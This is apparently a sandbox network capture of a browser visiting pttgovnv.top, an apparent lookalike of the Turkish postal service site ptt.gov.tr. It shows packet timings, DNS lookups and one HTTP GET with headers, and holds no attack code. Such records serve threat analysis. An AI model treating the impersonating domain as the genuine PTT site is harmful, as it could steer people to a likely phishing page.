          Sep 2, 2024 00:25:23.365700006 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.366525888 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366568089 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366605997 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.366611958 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366637945 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.366693974 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366729975 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366772890 CEST49780443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.366782904 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366812944 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366848946 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366862059 CEST49780443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.366868019 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366883039 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366895914 CEST49780443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.366931915 CEST49780443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.366935968 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.366966963 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367012978 CEST49780443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.367021084 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367033005 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367079020 CEST49780443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.367168903 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367216110 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.367223024 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367290974 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367335081 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.367341995 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367425919 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367455006 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367468119 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.367475033 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.367520094 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.367855072 CEST49780443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.367862940 CEST44349780172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.368190050 CEST49786443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.368213892 CEST44349786172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.368252993 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.368262053 CEST49786443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.368288040 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.368315935 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.368323088 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.368354082 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.369116068 CEST49786443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.369122982 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.369127989 CEST44349786172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.369183064 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.369194031 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.370524883 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.375611067 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.375745058 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.375778913 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.375786066 CEST49779443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.375791073 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.375828028 CEST49779443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.375832081 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.376672029 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.376718044 CEST49779443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.376725912 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.376765013 CEST49779443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.376773119 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.376821041 CEST49779443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.376825094 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.376853943 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.376863003 CEST49779443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.376893044 CEST49779443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.405849934 CEST49779443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.405863047 CEST44349779172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.406514883 CEST49787443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.406543016 CEST44349787172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.406603098 CEST49787443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.409265995 CEST49787443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.409279108 CEST44349787172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.411196947 CEST44349778172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.411257982 CEST44349778172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.411475897 CEST49778443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.449259043 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449299097 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449322939 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.449338913 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449348927 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.449403048 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449448109 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.449456930 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449717999 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449764967 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.449773073 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449858904 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449898958 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.449906111 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.449995995 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450042009 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.450047970 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450292110 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450339079 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.450345993 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450438976 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450483084 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.450490952 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450534105 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.450596094 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450628042 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450647116 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.450651884 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.450676918 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.450692892 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.451139927 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.451210976 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.451277971 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.451328993 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.451484919 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.451530933 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.451534033 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.451545000 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.451571941 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.451585054 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.451586962 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.451596022 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.451634884 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.452104092 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.452155113 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.452192068 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.452238083 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.452450037 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.452491045 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.452505112 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.452512026 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.452528954 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.453002930 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453042030 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453064919 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.453073025 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453098059 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.453186035 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453228951 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.453236103 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453363895 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453408957 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.453414917 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453577995 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453619957 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.453627110 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.453965902 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.454009056 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.454015970 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.454207897 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.454257965 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.454266071 CEST44349774172.67.174.217192.168.2.4
          Sep 2, 2024 00:25:23.454304934 CEST49774443192.168.2.4172.67.174.217
          Sep 2, 2024 00:25:23.463325977 CEST44349777104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:23.463377953 CEST44349777104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:23.463408947 CEST44349777104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:23.463437080 CEST44349777104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:23.463463068 CEST49777443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:23.463474989 CEST44349777104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:23.463495016 CEST49777443192.168.2.4104.21.47.250
          Sep 2, 2024 00:25:23.463829041 CEST44349777104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:23.463865042 CEST44349777104.21.47.250192.168.2.4
          Sep 2, 2024 00:25:23.463881969 CEST49777443192.168.2.4104.21.47.250
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Sep 2, 2024 00:25:10.541069984 CEST192.168.2.41.1.1.10x4dc6Standard query (0)pttgovnv.topA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:10.541316986 CEST192.168.2.41.1.1.10x72e4Standard query (0)pttgovnv.top65IN (0x0001)false
          Sep 2, 2024 00:25:11.566948891 CEST192.168.2.41.1.1.10xe822Standard query (0)pttgovnv.topA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:11.567126989 CEST192.168.2.41.1.1.10x129fStandard query (0)pttgovnv.top65IN (0x0001)false
          Sep 2, 2024 00:25:12.742207050 CEST192.168.2.41.1.1.10x5199Standard query (0)www.google.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:12.742644072 CEST192.168.2.41.1.1.10x8a40Standard query (0)www.google.com65IN (0x0001)false
          Sep 2, 2024 00:25:15.943797112 CEST192.168.2.41.1.1.10xb35eStandard query (0)pttgovnv.topA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:15.944492102 CEST192.168.2.41.1.1.10xd067Standard query (0)pttgovnv.top65IN (0x0001)false
          Sep 2, 2024 00:25:21.444833994 CEST192.168.2.41.1.1.10x51edStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:21.445161104 CEST192.168.2.41.1.1.10xd0f8Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
          Sep 2, 2024 00:25:31.602456093 CEST192.168.2.41.1.1.10x5299Standard query (0)www.ptt.gov.trA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:31.603024960 CEST192.168.2.41.1.1.10x94d5Standard query (0)www.ptt.gov.tr65IN (0x0001)false
          Sep 2, 2024 00:25:33.757957935 CEST192.168.2.41.1.1.10xeea6Standard query (0)pttem.alo-tech.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:33.758167982 CEST192.168.2.41.1.1.10x7c2bStandard query (0)pttem.alo-tech.com65IN (0x0001)false
          Sep 2, 2024 00:25:35.477998972 CEST192.168.2.41.1.1.10x66efStandard query (0)pttem.alo-tech.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:35.478164911 CEST192.168.2.41.1.1.10x7335Standard query (0)pttem.alo-tech.com65IN (0x0001)false
          Sep 2, 2024 00:25:36.258093119 CEST192.168.2.41.1.1.10xbd06Standard query (0)www.ptt.gov.trA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:36.258263111 CEST192.168.2.41.1.1.10xe33aStandard query (0)www.ptt.gov.tr65IN (0x0001)false
          Sep 2, 2024 00:25:38.157532930 CEST192.168.2.41.1.1.10x32acStandard query (0)chatserver.alo-tech.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.157677889 CEST192.168.2.41.1.1.10x5264Standard query (0)chatserver.alo-tech.com65IN (0x0001)false
          Sep 2, 2024 00:25:38.850867033 CEST192.168.2.41.1.1.10x8a08Standard query (0)pttem.alo-tech.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.851038933 CEST192.168.2.41.1.1.10x93ebStandard query (0)pttem.alo-tech.com65IN (0x0001)false
          Sep 2, 2024 00:25:38.851769924 CEST192.168.2.41.1.1.10x5072Standard query (0)netdna.bootstrapcdn.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.851936102 CEST192.168.2.41.1.1.10x10d0Standard query (0)netdna.bootstrapcdn.com65IN (0x0001)false
          Sep 2, 2024 00:25:40.651726961 CEST192.168.2.41.1.1.10xfaf2Standard query (0)service-edge.alo-tech.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:40.652009964 CEST192.168.2.41.1.1.10x41ccStandard query (0)service-edge.alo-tech.com65IN (0x0001)false
          Sep 2, 2024 00:25:40.764225960 CEST192.168.2.41.1.1.10x7a6cStandard query (0)chatserver.alo-tech.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:40.764504910 CEST192.168.2.41.1.1.10xb979Standard query (0)chatserver.alo-tech.com65IN (0x0001)false
          Sep 2, 2024 00:25:41.590176105 CEST192.168.2.41.1.1.10x9cdaStandard query (0)service-edge.alo-tech.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:41.590308905 CEST192.168.2.41.1.1.10xebb7Standard query (0)service-edge.alo-tech.com65IN (0x0001)false
          Sep 2, 2024 00:26:21.470712900 CEST192.168.2.41.1.1.10xb7dcStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
          Sep 2, 2024 00:26:21.471065998 CEST192.168.2.41.1.1.10x4b29Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Sep 2, 2024 00:25:11.580059052 CEST1.1.1.1192.168.2.40x4dc6No error (0)pttgovnv.top172.67.174.217A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:11.580059052 CEST1.1.1.1192.168.2.40x4dc6No error (0)pttgovnv.top104.21.47.250A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:11.580075979 CEST1.1.1.1192.168.2.40xe822No error (0)pttgovnv.top172.67.174.217A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:11.580075979 CEST1.1.1.1192.168.2.40xe822No error (0)pttgovnv.top104.21.47.250A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:12.677236080 CEST1.1.1.1192.168.2.40x72e4No error (0)pttgovnv.top65IN (0x0001)false
          Sep 2, 2024 00:25:12.677951097 CEST1.1.1.1192.168.2.40x129fNo error (0)pttgovnv.top65IN (0x0001)false
          Sep 2, 2024 00:25:12.749047041 CEST1.1.1.1192.168.2.40x5199No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:12.749854088 CEST1.1.1.1192.168.2.40x8a40No error (0)www.google.com65IN (0x0001)false
          Sep 2, 2024 00:25:16.118005037 CEST1.1.1.1192.168.2.40xb35eNo error (0)pttgovnv.top104.21.47.250A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:16.118005037 CEST1.1.1.1192.168.2.40xb35eNo error (0)pttgovnv.top172.67.174.217A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:16.620767117 CEST1.1.1.1192.168.2.40xd067No error (0)pttgovnv.top65IN (0x0001)false
          Sep 2, 2024 00:25:21.451426029 CEST1.1.1.1192.168.2.40x51edNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:24.147787094 CEST1.1.1.1192.168.2.40x3f5eNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:24.147787094 CEST1.1.1.1192.168.2.40x3f5eNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:24.630798101 CEST1.1.1.1192.168.2.40x429aNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:24.630798101 CEST1.1.1.1192.168.2.40x429aNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:31.658344984 CEST1.1.1.1192.168.2.40x5299No error (0)www.ptt.gov.tr185.220.152.26A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:33.801897049 CEST1.1.1.1192.168.2.40x7c2bNo error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:33.801897049 CEST1.1.1.1192.168.2.40x7c2bNo error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:33.802381992 CEST1.1.1.1192.168.2.40xeea6No error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:33.802381992 CEST1.1.1.1192.168.2.40xeea6No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:33.802381992 CEST1.1.1.1192.168.2.40xeea6No error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:35.519819975 CEST1.1.1.1192.168.2.40x66efNo error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:35.519819975 CEST1.1.1.1192.168.2.40x66efNo error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:35.519819975 CEST1.1.1.1192.168.2.40x66efNo error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:35.531078100 CEST1.1.1.1192.168.2.40x7335No error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:35.531078100 CEST1.1.1.1192.168.2.40x7335No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:36.307756901 CEST1.1.1.1192.168.2.40xbd06No error (0)www.ptt.gov.tr185.220.152.26A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.099217892 CEST1.1.1.1192.168.2.40x2360No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:38.099217892 CEST1.1.1.1192.168.2.40x2360No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.188340902 CEST1.1.1.1192.168.2.40x32acNo error (0)chatserver.alo-tech.comchat-server.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:38.188340902 CEST1.1.1.1192.168.2.40x32acNo error (0)chat-server.alo-tech.com34.107.233.18A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.189121008 CEST1.1.1.1192.168.2.40x5264No error (0)chatserver.alo-tech.comchat-server.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:38.858431101 CEST1.1.1.1192.168.2.40x10d0No error (0)netdna.bootstrapcdn.com65IN (0x0001)false
          Sep 2, 2024 00:25:38.859154940 CEST1.1.1.1192.168.2.40x5072No error (0)netdna.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.859154940 CEST1.1.1.1192.168.2.40x5072No error (0)netdna.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.892626047 CEST1.1.1.1192.168.2.40x8a08No error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:38.892626047 CEST1.1.1.1192.168.2.40x8a08No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:38.892626047 CEST1.1.1.1192.168.2.40x8a08No error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:38.898827076 CEST1.1.1.1192.168.2.40x93ebNo error (0)pttem.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:38.898827076 CEST1.1.1.1192.168.2.40x93ebNo error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:40.661859989 CEST1.1.1.1192.168.2.40x41ccNo error (0)service-edge.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:40.661859989 CEST1.1.1.1192.168.2.40x41ccNo error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:40.697115898 CEST1.1.1.1192.168.2.40xfaf2No error (0)service-edge.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:40.697115898 CEST1.1.1.1192.168.2.40xfaf2No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:40.697115898 CEST1.1.1.1192.168.2.40xfaf2No error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:40.773468018 CEST1.1.1.1192.168.2.40x7a6cNo error (0)chatserver.alo-tech.comchat-server.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:40.773468018 CEST1.1.1.1192.168.2.40x7a6cNo error (0)chat-server.alo-tech.com34.107.233.18A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:40.774096012 CEST1.1.1.1192.168.2.40xb979No error (0)chatserver.alo-tech.comchat-server.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:41.636904955 CEST1.1.1.1192.168.2.40x9cdaNo error (0)service-edge.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:41.636904955 CEST1.1.1.1192.168.2.40x9cdaNo error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:41.636904955 CEST1.1.1.1192.168.2.40x9cdaNo error (0)lb-p3.alo-tech.com35.201.78.44A (IP address)IN (0x0001)false
          Sep 2, 2024 00:25:41.636934996 CEST1.1.1.1192.168.2.40xebb7No error (0)service-edge.alo-tech.comgcp.application.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:25:41.636934996 CEST1.1.1.1192.168.2.40xebb7No error (0)gcp.application.alo-tech.comlb-p3.alo-tech.comCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:26:03.767333031 CEST1.1.1.1192.168.2.40x87baNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:26:03.767333031 CEST1.1.1.1192.168.2.40x87baNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          Sep 2, 2024 00:26:21.485188961 CEST1.1.1.1192.168.2.40xb7dcNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
          Sep 2, 2024 00:26:21.880696058 CEST1.1.1.1192.168.2.40xd592No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
          Sep 2, 2024 00:26:21.880696058 CEST1.1.1.1192.168.2.40xd592No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449737172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:13 UTC660OUTGET /help/ HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          sec-ch-ua-platform: "Windows"
          Upgrade-Insecure-Requests: 1
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: navigate
          Sec-Fetch-User: ?1
          Sec-Fetch-Dest: document
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:13 UTC707INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:13 GMT
          Content-Type: text/html; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          CF-Cache-Status: DYNAMIC
